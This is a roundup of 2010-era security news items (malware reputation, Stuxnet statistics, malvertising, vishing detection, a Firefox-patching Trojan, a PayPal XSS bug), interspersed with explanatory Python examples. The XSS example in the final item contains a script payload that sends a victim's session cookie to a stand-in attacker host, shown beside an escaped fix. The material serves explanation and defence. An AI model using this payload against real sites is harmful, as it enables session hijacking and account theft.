Symantec counters malware threat with Ubiquity
Symantec is stepping up its fight against malware with the introduction of a next-gen platform dubbed "Ubiquity."
Ubiquity - which analyzes the anonymous software usage patterns of more than 100 million Symantec-shielded PCs - allows the security company to more effectively protect against micro-distributed, mutating threats.
"Ubiquity adds a new layer of protection that bolsters [our] existing [defenses], such as intrusion prevention, [as well as] behavioral and heuristic detection capabilities," explained Symantec senior VP Stephen Trilling.
"[Now], traditional protection [methods] require [an initial] capture and analysis of specific strains of malware. [But] Ubiquity takes a fundamentally different approach to help [secure] infrastructure from the [latest] and most targeted threats."
According to Trilling, Ubiquity operates by formulating a security rating for each file based on specific (anonymous) user-generated data - including origin, age, adoption patterns and other proprietary calculations.
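To make the idea of a telemetry-derived rating concrete, here is an added toy scorer (example code, not Symantec's): the weights, thresholds and origin table are hypothetical, and the telemetry records are constructed. What it shows is why a prevalence-based rating catches the "micro-distributed, mutating" case without a signature: each variant has a different hash, but every one of them is new, rare and from an unknown source.

```python
"""Toy file-reputation scorer in the spirit of the Ubiquity description above.

Added example, not Symantec code: the formula and weights are a hypothetical
illustration of deriving trust from telemetry (how many machines report a file,
how long it has existed, where it came from) rather than from a signature.
"""
import math
from dataclasses import dataclass

# Hypothetical origin reputations, 1.0 = fully trusted source, 0.0 = unknown.
ORIGIN_REPUTATION = {
    "signed:Microsoft Corporation": 1.0,
    "download:updates.example-vendor.com": 0.9,
    "download:unknown": 0.0,
}

@dataclass(frozen=True)
class FileTelemetry:
    sha256: str          # identity of the exact file contents
    machines_seen: int   # distinct installs that reported this hash
    age_days: float      # days since the hash was first reported anywhere
    origin: str          # key into ORIGIN_REPUTATION

def reputation(t: FileTelemetry) -> float:
    """0..1 trust score. Prevalence is log-scaled so that 3 vs 30 machines
    matters more than 30 000 vs 300 000; age saturates after a month."""
    prevalence = min(1.0, math.log10(t.machines_seen + 1) / 6.0)   # ~1 at a million installs
    age = min(1.0, t.age_days / 30.0)
    origin = ORIGIN_REPUTATION.get(t.origin, 0.0)
    return round(0.5 * prevalence + 0.3 * age + 0.2 * origin, 3)

def verdict(t: FileTelemetry) -> str:
    score = reputation(t)
    if score >= 0.6:
        return "trusted"
    if score >= 0.3:
        return "unknown"
    return "suspicious"

# Constructed telemetry. The two low-prevalence entries stand for a mutating
# threat: different hashes, each seen on a handful of machines, from nowhere.
SAMPLES = [
    FileTelemetry("hash-notepad", machines_seen=2_000_000, age_days=400,
                  origin="signed:Microsoft Corporation"),
    FileTelemetry("hash-vendor-tool", machines_seen=5_000, age_days=45,
                  origin="download:updates.example-vendor.com"),
    FileTelemetry("hash-variant-1", machines_seen=3, age_days=1,
                  origin="download:unknown"),
    FileTelemetry("hash-variant-2", machines_seen=2, age_days=0.5,
                  origin="download:unknown"),
]

def triage(samples=SAMPLES) -> dict[str, str]:
    """Verdict per hash; a real system would also gate by user risk tolerance."""
    return {t.sha256: verdict(t) for t in samples}

if __name__ == "__main__":
    for h, v in triage().items():
        print(f"{h:18} {v}")
```

The caveat a practitioner will spot: a legitimate new build from a small vendor looks exactly like variant-1 on its first day, so a rating like this is a prioritisation signal for sandboxing or a prompt, not a block decision on its own.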
New Versions of Websense Defensio Automatically Remove Malicious Content from Business and Celebrity Social Networking Sites
About 40 percent of Facebook posts contain links and about 10 percent of those posts are either malicious or spam. That puts the average Facebook user one click away from malware a few times each day. And even though individual pages are being targeted, more risk comes from high-volume corporate and celebrity pages. Websense, Inc. (NASDAQ: WBSN), a global leader in unified Web, data and email security, is now offering an expanded suite of Defensio 2.0 security services for businesses and celebrities. Defensio 2.0 reduces security, productivity, and legal liability risks by analysing and classifying user-generated content that is posted to corporate and personal Websites, blogs, user forums, and social networking sites.
The technology also enhances the real-time threat intelligence of Websense products, including the industry-leading Websense Web Security Gateway. Defensio, the security eyes and ears of Facebook and the blogging world, analyses more than 2.5 million comments and tens of millions of URLs weekly. The sweeping Web 2.0 threat detection and analysis conducted by Defensio is then incorporated into all Websense solutions, which are powered by the Advanced Classification Engine and the Threatseeker Network. As a result, Websense customers are protected from emerging threats and malicious content before they spread beyond the social Web and are addressed by traditional security offerings. Websense is the only security vendor able to integrate into its security solutions the threat intelligence captured behind the closed doors of private social networks, where many threats first emerge, incubate, and spread.
The Defensio 2.0 service is based on technology acquired in 2009 and is in use today in a free, personal version by more than 25,000 Facebook and blog users. The free personal version is still available, but Websense now offers new specific versions that address the needs of smaller and larger companies and celebrities.
Symantec now manages Apple iOS and Google Android smartphones
Symantec today announced that its mobile device management software now supports Apple iOS and Google Android, via Microsoft's Enterprise ActiveSync protocol, which both platforms support. The release is part of an expanded push by the security vendor to eventually deal with the wide range of mobility threats.
Symantec is developing for future release an agent for iOS and Android. The agent will give enterprise IT groups greater and more detailed control over how employees can use these handsets. It already has similar agents for Windows Mobile and RIM BlackBerry OS.
Also in development are products aimed at mobile carriers. These new applications, scheduled for announcement in a few weeks, will give carriers more visibility into mobile traffic and more control over the threats to their cellular subscribers, according to Jon Kuhn, director of product management for Symantec's Enterprise Security Group.
The mobile OS support added to Symantec Mobile Management Version 7.0 (released late in 2009) creates a security management application that can work across several of the most popular mobile platforms. A growing number of companies no longer standardize on just one mobile OS, though the degree to which they support different OSs varies with the platform, requirements, applications and available third-party tools.
Data Shows Iran No Longer A Stuxnet Hotspot
Kaspersky Lab released its malware statistics report for September. Buried among the data on the top malware detected on users' machines and being pushed from malicious Web sites is an interesting factoid: Iran no longer ranks as a Stuxnet hotspot, while India continues to struggle with the effects of the sophisticated virus.
The data, compiled from systems running Kaspersky's security software, isn't authoritative and represents just a slice of infected systems in the countries in question. However, it suggests that Stuxnet - a sophisticated virus that is believed to have been a targeted attack against Iran's uranium enrichment facilities - is no longer prevalent in that country. India, which has registered the most Stuxnet infections, continues to struggle to eradicate the virus, Kaspersky's data suggests.
We've been hearing for a while that Iran was taking aggressive steps to contain the Stuxnet virus. India has been the epicenter of Stuxnet infections since it was first detected, with Iran the country with the third most infections. The number of reported infections in Iran has steadily decreased during that time. Kaspersky Lab researcher Aleks Gostev wrote on September 26 that Iran was doing a good job cleaning systems infected by the virus. He predicted, then, that the country would soon cease to be one of the centers of the epidemic. Data from Kaspersky's September report appears to confirm that prediction.
Also see: http://forums.cnet.com/7726-6132_102-5002725.html
Trade Me says update to avoid malvertisements
Only users with out-of-date browsers, OSes and antivirus affected by malware, auction site says
Online marketplace Trade Me was targeted by cybercriminals on Thursday and Friday last week.
In a statement, Trade Me notes: "A malicious advertisement purporting to be for Lonely Planet was detected on the site on Thursday and Friday. This 'malvertisement' is a combination of malicious software and advertising, where cybercriminals use an online advertisement to distribute malicious software.
"If a member viewed the advertisement with an out-of-date browser or operating system, and had out-of-date anti-virus software, they may have been invited to download a program purporting to be 'anti-virus' software. Only users that downloaded this malicious software will have been affected.
"Trade Me advised its members of the issue with the advertisement via a blog announcement and posts on the Trade Me message boards on Friday."
Trade Me spokesman Paul Ford said the company was aware of five people that had downloaded the malicious software and had their computers affected. "As soon as we became aware of the attack we took down the advertising tile and advised our members. So far 47 members have contacted us however most of those have not been affected," Ford says.
The statement continues: "The vast majority of Trade Me members will not have seen the advertisement or received the invitation to download the infected software."
Top reason for Facebook unfriending: Too many useless posts
University of Colorado Denver researcher says politics, religion can also result in Facebook unfriending by social network users
The No. 1 reason why friends dump friends on Facebook is when they get fed up seeing too many useless posts, according to new research out of the University of Colorado Denver Business School.
Posts about polarizing subjects such as politics and religion as well as inappropriate and racist comments also sever many Facebook relationships, according to Christopher Sibona, a PhD student in the Computer Science and Information Systems program.
"Researchers spend a lot of time examining how people form friendships online but little is known on how those relationships end," said Sibona, whose research will be published in January by the Hawaii International Conference on System Sciences. "Perhaps this will help us develop a theory of the entire cycle of friending and unfriending." [...]
Sibona surveyed more than 1,500 Facebook users to get to the bottom of why people dump each other. Not surprisingly, people who flood others with posts are at great risk of being unfriended.
"The 100th post about your favorite band is no longer interesting," he said.
The study showed that 57% of people unfriended as a result of online actions and that those who make friend requests are more at risk of being suddenly unfriended.
Sibona found mixed reactions by those who have been unfriended, largely dependent upon who did the deed and why.
While millions have enjoyed reconnecting with old friends and meeting new ones on Facebook, the social network has also brought with it many headaches, including those perpetrated by malware writers and other scammers.
FCC May Confront ISPs on Bot, Malware Scourge
The Federal Communications Commission (FCC) may soon kickstart a number of new initiatives to encourage Internet service providers to do a better job cleaning up bot-infected PCs and malicious Web sites on their networks, KrebsOnSecurity has learned.
Earlier this year, the commission requested public comment on its "Cybersecurity Roadmap," an ambitious plan to identify dangerous vulnerabilities in the Internet infrastructure, as well as threats to consumers, businesses and governments. On a couple of occasions over the past few weeks I had an opportunity to chat with Jeffery Goldthorp, associate bureau chief of the FCC's Public Safety & Homeland Security Bureau, about some of the ideas the commission is considering for inclusion in the final roadmap, due to be released in January 2011.
Goldthorp said there are several things that the commission can do to create incentives for ISPs to act more vigorously to protect residential users from infections by bot programs.
Voice-routing call fingerprint system fights 'vishing'
Security researchers in the States say they have developed a cunning new method of "fingerprinting" voice calls that could offer a route to trustworthy caller ID and a barrier against so-called "vishing" or voice phishing.
The tool is called PinDr0p, and works by analysing the various characteristic noise artifacts left in audio by the different types of voice network - cellular, VoIP etc. For instance, packet loss leaves tiny gaps in audio signals, too brief for the human ear to detect, but quite perceptible to the PinDr0p algorithms. Vishers and others wishing to avoid giving away the origin of a call will often route a call through multiple different network types.
"There's a joke: 'On the Internet, no one knows you're a dog'. Now that's moving to phones," says Mustaque Ahamad of the Georgia Institute of Technology. "The need is obvious to build security into these voice systems ... PinDr0p needs no additional detection infrastructure; all it uses is the sound you hear on the phone."
According to the system's inventors, there's no way for vishers or other voicey villains to eliminate the traces a given system of call routing leaves in the audio eventually received at the other end. [...]
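The packet-loss artifact described above is easy to see in code. The block below is an added illustration of the principle, not the Georgia Tech PinDr0p implementation: it synthesises a one-second narrowband "call" as 16-bit PCM, drops whole packets the way a VoIP receiver without loss concealment would, then finds runs of near-silence that are far longer than a zero crossing but far shorter than a pause in speech, and summarises them as features a classifier could consume. Sample rate, packet duration and the silence/length thresholds are assumptions.

```python
"""Illustration of the audio-artifact idea behind PinDr0p: find the short
silent gaps that packet loss leaves in a call and turn them into features.

Added example, not the Georgia Tech code. The 8 kHz rate and 20 ms frames are
typical narrowband-VoIP assumptions; the "call" is a constructed tone with
loss injected on purpose.
"""
import math

SAMPLE_RATE = 8000                        # Hz (assumption: narrowband telephony)
FRAME_MS = 20                             # ms per packet (assumption)
FRAME = SAMPLE_RATE * FRAME_MS // 1000    # 160 samples per packet

def synth_call(seconds: float, lost_frames: set[int], freq: float = 440.0) -> list[int]:
    """Constructed 16-bit PCM tone. Samples of every frame in `lost_frames` are
    zeroed, which is what a receiver plays for a dropped packet when it does no
    concealment."""
    n = int(seconds * SAMPLE_RATE)
    pcm = [int(8000 * math.sin(2 * math.pi * freq * i / SAMPLE_RATE)) for i in range(n)]
    for f in lost_frames:
        for i in range(f * FRAME, min(n, (f + 1) * FRAME)):
            pcm[i] = 0
    return pcm

def find_gaps(pcm: list[int], silence: int = 50, min_ms: int = 5, max_ms: int = 80):
    """Return (start_sample, length_ms) for each run of near-silent samples that
    is longer than a zero crossing (a single sample here) but shorter than a
    deliberate pause. Thresholds are assumptions."""
    min_len = SAMPLE_RATE * min_ms // 1000
    max_len = SAMPLE_RATE * max_ms // 1000
    gaps, run_start = [], None
    for i, x in enumerate(pcm + [silence + 1]):      # sentinel flushes a trailing run
        if abs(x) < silence:
            if run_start is None:
                run_start = i
        elif run_start is not None:
            length = i - run_start
            if min_len <= length <= max_len:
                gaps.append((run_start, length * 1000 / SAMPLE_RATE))
            run_start = None
    return gaps

def loss_fingerprint(pcm: list[int]) -> dict:
    """Features a path classifier could use: gap count, gaps per frame, mean gap."""
    gaps = find_gaps(pcm)
    frames = len(pcm) / FRAME
    mean_ms = sum(g[1] for g in gaps) / len(gaps) if gaps else 0.0
    return {"gaps": len(gaps),
            "loss_rate": round(len(gaps) / frames, 4),
            "mean_gap_ms": round(mean_ms, 1)}

def demo():
    """Clean call versus one that lost packets 10 and 30 on its way to us."""
    clean = synth_call(1.0, set())
    lossy = synth_call(1.0, {10, 30})
    return loss_fingerprint(clean), loss_fingerprint(lossy)

if __name__ == "__main__":
    print(demo())
```

Two adjacent lost packets merge into one 40 ms gap, so gap length distribution (not just count) is part of the fingerprint; a path that applies packet-loss concealment fills the gaps with synthetic audio and leaves different, subtler artifacts that this silence detector would not see.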
The PinDr0p research was funded by the US National Science Foundation. There's a statement on it here.
Qualys Acquires Nemean Networks
Qualys, a provider of security vulnerability assessment services, has acquired a research firm that specializes in detecting malware on websites.
The acquisition of Nemean Networks will be the basis for adding new capabilities to the Qualys lineup in 2010 that will be more focused on actual security protection in addition to providing vulnerability scans.
Nemean Networks has developed an intrusion-detection system and a ******** system that provides visibility into attacks on websites - and there already are more than 1 million sites infected with malware. With the acquisition, Qualys said the first order of business will be to work with the security community to develop intrusion-detection system signatures that can be applied to Snort and other open source security tools.
Why a "Sandbox" Makes Adobe Reader More Secure
Adobe released a major security update for Adobe Reader and Acrobat yesterday--a week ahead of the quarterly release scheduled for next Tuesday. At the same time, Adobe provided a glimpse at how "sandboxing" in the upcoming Adobe Reader Protected Mode will help prevent exploits even when vulnerabilities exist.
The out-of-band update from Adobe fixes a whopping 23 vulnerabilities in Acrobat and Reader. Most of the vulnerabilities are critical, and at least one has been actively exploited in targeted PDF attacks for a month or more.
Adobe has recognized that the cross-platform, ubiquitous nature of its products has made it a primary target for exploits and malware, and it has taken steps to improve coding practices and develop inherently more secure software. However, it is unreasonable to expect that Adobe--or any other developer--can create impenetrably secure software, so other defenses are needed to shield off attacks.
Enter "sandboxing". A post from Kyle Randolph on the Adobe Secure Software Engineering Team (ASSET) blog defines the concept. "A sandbox is a security mechanism used to run an application in a confined execution environment in which certain functions (such as installing or deleting files, or modifying system information) are prohibited. In Adobe Reader, "sandboxing" (also known as "Protected Mode") adds an additional layer of defense by containing malicious code inside PDF files within the Adobe Reader sandbox and preventing elevated privilege execution on the user's system."
The ASSET blog post also explains some of the limitations of the sandboxing approach.
BLADE Software Eliminates "Drive-By Downloads" from...
Insecure Web browsers and the growing number of complex applets and browser plug-in applications are allowing malicious software to spread faster than ever on the Internet. Some websites are installing malicious code, such as spyware, on computers without the user's knowledge or consent.
These so-called "drive-by downloads" signal a shift away from using spam and malicious e-mail attachments to infect computers. Approximately 560,000 websites -- and 5.5 million Web pages on those sites -- were infected with malware during the fourth quarter of 2009.
A new tool that eliminates drive-by download threats has been developed by researchers at the Georgia Institute of Technology and California-based SRI International. BLADE -- short for Block All Drive-By Download Exploits -- is browser-independent and designed to eliminate all drive-by malware installation threats. Details about BLADE were presented today at the Association for Computing Machinery's Conference on Computer and Communications Security.
Facebook unveils changes to enhance privacy
Facebook on Wednesday rolled out new features designed to make people feel more comfortable putting photos, videos, and other personal data online.
In a blog post, CEO Mark Zuckerberg unveiled an overhauled version of Facebook Groups that allows users to share certain content with select people, rather than with everyone listed as a friend. Vacation photos, for instance, might be shared only with family members, and a team roster might be shared only with other members of one's Fantasy Football league. It was one of three features Zuckerberg announced.
"We've heard loud and clear that you want more control over what you share on Facebook, to manage exactly who sees it and to understand exactly where it goes," Zuckerberg wrote. "With this new Groups experience and the other tools we're rolling out today, we're taking a few important steps forward towards giving you precise controls."
Also unveiled was a new dashboard that tells users at a glance how various Facebook apps are using their data. The panel shows all the apps a user has authorized, what data they use and when the data was last accessed. [...]
Facebook will begin rolling out the features later on Wednesday.
Microsoft Suggests Public Health Response for Sick PCs
When your sick PC connects to the Internet and starts distributing malicious spam and propagating worms and viruses to other vulnerable systems, it impacts all who share the Internet. Microsoft's Scott Charney proposes a novel approach to addressing that issue, suggesting that we treat infected devices as we do infected people.
Many organizations have already adopted some form of network access protection (NAP). NAP solutions analyze the security configuration and posture of a given system before allowing it to connect to network resources. If the user account password is too simple, or the personal firewall is disabled, or the antimalware software is not up to date, the device is redirected to a safe site that explains the baseline security requirements and provides links to get the computer compliant, or simply bans the computer from connecting.
Consumers, however, make up a significant percentage of the computers sharing the Internet, and with no IT admin or computer security team overseeing things the odds of compromise or infection are higher. Consumers view computers as an appliance--on par with the TV or microwave or an automobile. They simply want them to work and perform the tasks they were designed to perform without requiring some sort of advanced knowledge and constant monitoring.
In a blog post related to his proposal, Charney spells out the problem, "commonly available cyber defenses such as firewalls, antivirus and automatic updates for security patches can reduce risk, but they're not enough. Despite our best efforts, many consumer computers are host to malware or are part of a botnet. "Bots," networks of compromised computers controlled by hackers, can provide criminals with a relatively easy means to commit identity theft and also lead to much more devastating consequences if used for an attack on critical government infrastructure or financial systems."
Patchy Phisher Forces Firefox to Forego Forgetting Passwords
Every browser can, at the user's discretion, be set up to remember passwords. In general, Webroot advises most users not to set the browser to store login credentials, because they're so easily extracted by password-stealing Trojans like Zbot. In Firefox, for example, you can click Tools, Options, then open the Security tab, and uncheck a box that tells the browser to remember passwords entered into Web forms. (The box is checked by default.)
But in the course of taking a more thorough look at a Trojan that came to our attention in July, we were surprised to see the Trojan modify a core Firefox file. Upon closer inspection, the Trojan patches a file named nsLoginManagerPrompter.js. The patch adds a few lines of code (displayed above), and comments-out other portions of code, that dictate whether Firefox prompts the user to save passwords when he or she logs into a secure site.
Before the infection, a default installation of Firefox 3.6.10 would prompt the user after the user clicks the Log In button on a Web page, asking whether he or she wants to save the password. After the infection, the browser simply saves all login credentials locally, and doesn't prompt the user. [...]
One thing that neither we nor any other AV company can do is fix the modified Firefox file. However, there's an easy fix for that as well: simply download the latest Firefox installer and install it over the top of your existing installation. You won't lose any bookmarks or add-ons, and the installer will just overwrite the modified nsLoginManagerPrompter.js file. Problem solved.
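Reinstalling is the cure; spotting the tampering in the first place is the harder part, because the patched file keeps its name, size class and location. The added block below (example code, not Webroot's or Mozilla's) shows the standard answer: hash every file of a known-good install into a manifest, then diff the live tree against it and report modified, missing and added files. The install tree and file contents are constructed in a temporary directory, and the `components/` layout is an assumption about where the prompter script lives.

```python
"""Detect tampering with a browser's own script files, as with the patched
nsLoginManagerPrompter.js above. Added example, not Webroot or Mozilla code:
it hashes every file under an install directory into a manifest taken from a
known-good copy and later reports modified, missing and added files. The
install tree below is constructed in a temporary directory; the real layout
of a Firefox install is an assumption here."""
import hashlib
import tempfile
from pathlib import Path

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root: Path) -> dict[str, str]:
    """Relative POSIX path -> sha256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def verify(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Compare the live tree with the baseline manifest."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }

def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean install, then patch the prompter
    the way the Trojan did (same file name, behaviour changed) and drop an
    extra file next to it. File contents are stand-ins, not real Firefox code."""
    with tempfile.TemporaryDirectory() as tmp:
        install = Path(tmp) / "firefox"
        comps = install / "components"
        comps.mkdir(parents=True)
        prompter = comps / "nsLoginManagerPrompter.js"
        prompter.write_text("// stand-in: ask before saving\nshowSaveLoginNotification(login);\n")
        (comps / "nsLoginManager.js").write_text("// stand-in: untouched component\n")
        (install / "firefox.exe").write_bytes(b"MZ constructed stub, not a real binary")
        baseline = build_manifest(install)

        prompter.write_text("// stand-in: save silently\n// showSaveLoginNotification(login);\n")
        (comps / "unknown.dll").write_bytes(b"constructed extra file")
        return verify(install, baseline)

if __name__ == "__main__":
    print(demo())
```

The baseline must come from a trusted source (the installer package or a freshly installed copy), not from the machine under suspicion, and a Trojan running with the user's rights can just as easily alter the checker or its manifest; that is why the practical remedy is still the reinstall over the top.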
Microsoft Security Essentials available to SMBs tomorrow
From Microsoft's Windows Security Blog:
We announced back in September that Microsoft Security Essentials would be changing its licensing terms and would soon become available to small business on up to 10 PCs. We are happy to announce that beginning tomorrow, October 7, the change will go into effect and small business owners will be able to download and install Microsoft Security Essentials. This new availability will allow small businesses that operate outside of the home to take advantage of Microsoft's no-cost antimalware service that will help them save time, save money and remain productive while protecting them from viruses, spyware and other malicious threats. If you operate a small business with more than 10 PCs, we do recommend that you consider using the Forefront line products to address your security needs.
Reports of rogue ESET Smart Security malware
We have received reports of a rogue security software program disguised with a false ESET Smart Security image.
This type of infiltration is known as scareware, which claims to be legitimate security software but is actually malware itself.
ESET does not advertise security software by installing anything to your computer. Current ESET customers who suspect an infection on their computer should visit the following ESET Knowledgebase article:
I think my computer has a virus - what should I do?
If you are a customer of another security vendor besides ESET and have the rogue Smart Security malware on your computer, follow the steps in the ESET Knowledgebase article linked above, substituting your current security software in steps 3 and 4, or contact your security software vendor.
If you are not a customer and you currently do not have security software, visit our Free Antivirus Utilities page to run the ESET Online Scanner and to use our Spyware Removal and Antivirus Tools.
Hackable Bug Found On PayPal.com
A new XSS (cross site scripting) vulnerability was identified on Paypal.com earlier today, found by a researcher who goes by the name d3v1l and disclosed on both Security-Shell and XSSed. That bug would allow a malicious hacker to insert code on the site that could potentially be used to access a user's account.
The problem, technically, is found in the parameter sender_country in a transaction called nvpsm. NVP is Paypal's API for Merchants to use when interacting with the Paypal web site, it stands for Name-Value Pair. SM is short for "send money". A problem such as this can be used to capture a user's session (essentially log in as that user) and perform privileged actions (money transfers) as that user, as well as send a user a valid Paypal URL but then redirect them to a malicious third party site (phishing, malware, etc.).
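The class of bug, reduced to its essentials, as an added example (not PayPal's code; only the parameter name sender_country is taken from the article, while the host, page template and payload are constructed): a handler echoes a query parameter into an HTML attribute unencoded, beside the hardened version that applies contextual output encoding. The probe function builds the URL a scanner would request, and the vulnerable page returns the attacker's tag intact.

```python
"""Reflected XSS of the kind described above, cut down to a single handler that
echoes a query parameter into an HTML attribute. Added example, not PayPal's
code: only the parameter name sender_country comes from the article; the URL,
page template and payload are constructed."""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Attribute-breakout payload: closes value="..." and injects a script tag that
# would ship the session cookie to a constructed attacker host.
PAYLOAD = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

def _param(url: str, name: str) -> str:
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]

def render_vulnerable(url: str) -> str:
    """Echoes sender_country straight into the attribute value."""
    country = _param(url, "sender_country")
    return f'<input name="sender_country" value="{country}">'

def render_fixed(url: str) -> str:
    """Contextual output encoding: html.escape(..., quote=True) neutralises the
    characters that matter inside a double-quoted attribute, so the browser sees
    literal text rather than markup."""
    country = html.escape(_param(url, "sender_country"), quote=True)
    return f'<input name="sender_country" value="{country}">'

def probe_url(value: str) -> str:
    """Build the send-money style URL a scanner would request (host is constructed)."""
    return "https://www.example.com/cgi-bin/webscr?cmd=_send-money&sender_country=" + quote(value)

def reflects_markup(page: str) -> bool:
    """Crude scanner check: did our tag survive into the response unencoded?"""
    return "<script>" in page

if __name__ == "__main__":
    url = probe_url(PAYLOAD)
    print("vulnerable:", render_vulnerable(url))
    print("fixed:     ", render_fixed(url))
```

Marking the session cookie HttpOnly blocks the cookie theft shown in the payload but not actions the injected script performs from inside the victim's page, so the encoding fix is the real remedy, with a restrictive Content-Security-Policy as defence in depth.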